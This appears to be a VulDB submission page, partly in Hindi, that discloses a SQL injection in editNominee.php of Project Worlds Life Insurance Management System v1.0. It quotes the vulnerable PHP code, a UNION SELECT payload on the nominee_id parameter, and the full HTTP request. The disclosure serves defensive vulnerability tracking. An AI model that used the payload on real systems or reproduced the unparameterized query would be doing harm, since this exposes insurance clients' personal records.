जमा करें #435424: Project Worlds Life Insurance Management System v1.0 SQL Injectionजानकारी

शीर्षकProject Worlds Life Insurance Management System v1.0 SQL Injection
विवरण# SQL Injection vulnerability was discovered in Life Insurance Management System(editNominee.php) Official Website: https://projectworlds.in/life-insurance-management-system-in-php/ Version: 1.0 Related Code file: /lims/editNominee.php dbname=lims Payload: /lims/editNominee.php?nominee_id=-1511986129-562418685' union select 1,database(),3,4,5,6,7,8,9--+ <hr> ```php <?php include'connection.php'; if($_SERVER["REQUEST_METHOD"] == "GET"){ $nominee_id = $_GET["nominee_id"]; } $sql = "SELECT * from nominee where nominee_id='$nominee_id'"; $result = $conn->query($sql); echo "<div>\n"; echo '<form action="updateNominee.php" method="post">'; while($row = $result->fetch_assoc()) { echo "<label for=\"fname\">NOMINEE ID</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"nominee_id\" placeholder=\"nominee id..\" value=\"$row[nominee_id]\">"; echo "<label for=\"fname\">CLIENT ID</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"client_id\" placeholder=\"client id..\" value=\"$row[client_id]\">"; echo "<label for=\"fname\">NAME</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"name\" placeholder=\"nominees Name..\" value=\"$row[name]\">"; echo "<label for=\"fname\">GENDER</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"sex\" placeholder=\"nominees gender..\" value=\"$row[sex]\">"; echo "<label for=\"fname\">BIRTH DATE</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"birth_date\" placeholder=\"nominees Birth Date..\" value=\"$row[birth_date]\">"; echo "<label for=\"fname\">NID</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"nid\" placeholder=\"nominees NID..\" value=\"$row[nid]\">"; echo "<label for=\"fname\">RELATIONSHIP</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"relationship\" placeholder=\"Relationship With Client..\" value=\"$row[relationship]\">"; echo "<label for=\"fname\">PRIORITY</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"priority\" placeholder=\"Priority..\" value=\"$row[priority]\">"; echo "<label for=\"fname\">PHONE</label>"; echo "<input type=\"text\" nominee_id=\"fname\" name=\"phone\" placeholder=\"nominees Phone..\" value=\"$row[phone]\">"; } echo "<input type=\"submit\" value=\"UPDATE\">"; echo "</form>\n"; echo "<a href='deleteNominee.php?nominee_id=".$nominee_id."'>Delete Nominee</a>"; echo "</div>\n"; echo "\n"; ?> ``` The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 87-138 of editNominee.php) Injection parameter: nominee_id ``` GET /lims/editNominee.php?nominee_id=-1511986129-562418685%27%20union%20select%201,database(),3,4,5,6,7,8,9--+ HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=m36in4a8ui1q6k23afkenkqivk Connection: close ``` ![image](https://github.com/user-attachments/assets/4879491d-0d4a-46ef-b7d1-bf10044a5b8a)
स्रोत⚠️ https://github.com/GKb0y/Cve-report/blob/main/SQLi-life-insurance-management-system.md
उपयोगकर्ता
 G__K (UID 76923)
सबमिशन01/11/2024 10:24 AM (1 वर्ष पहले)
संयम02/11/2024 07:09 PM (1 day later)
स्थितिस्वीकृत
VulDB प्रविष्टि282904 [Project Worlds Life Insurance Management System 1.0 /editNominee.php nominee_id SQL इंजेक्शन]
अंक20

पिछलासिंहावलोकनअगला

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!